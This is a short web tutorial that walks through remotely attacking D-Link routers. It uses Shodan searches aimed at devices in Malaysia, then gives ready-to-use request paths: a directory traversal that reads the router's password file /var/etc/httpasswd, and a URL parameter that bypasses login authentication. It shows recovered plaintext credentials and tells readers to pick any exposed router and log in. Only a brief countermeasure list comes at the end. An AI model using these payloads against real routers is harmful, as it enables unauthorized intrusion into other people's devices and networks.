Remote D-Link Router Attack

Shodan is a search engine that lets the user find specific types of computers (routers, servers, webcam etc.) connected to the internet using a variety of filters.


1. In this tutorial, we will make use of the vulnerability of D-link router's firmware to run Directory Traversal Attack. For more information, please check this CVE.


2. Firstly, browse www.shodan.io to explore all the Online devices.


3. Register and login an Shodan account in order to unlock the advanced search features.


4. Search through all the Online Vulnerable Modem Router Model by using this parameter: Mathopd/1.5p6 country:MY
You may search also other vulnerable models that mentioned in CVE such as Mathopd 1.4.x and 1.5.x before 1.5p7. In this case, we target Malaysia country.


5.  Select/click any routers and proceed to the login page.


6. Now, enter the below script to access the login credential file of the router. Credit goes to Keith Rozario
/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
Eg: http://IP Address:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd



7. Now you will see the login credential shown in plain text. Next, you may use the Login ID and Password to access the router.

Login ID = ManagementPassword = TestingR2
8. Alternatively, you can just bypass the login authentication by using this script.
/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
Eg: http://IP Address:8080/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0

Keys to Success
  • Modem router using the vulnerable version that mentioned in the CVE.
  • In order to exploit online, the target router must enable remote access. 
  • The password file must listed/located in the correct path which is /var/etc/httpasswd.
Countermesure
  1. Turn off the router remote access feature if you are not using.
  2. Update to latest available firmware. 
  3. Contact service provider if you have no idea how to apply those countermeasure.
References: www.keithrozario.com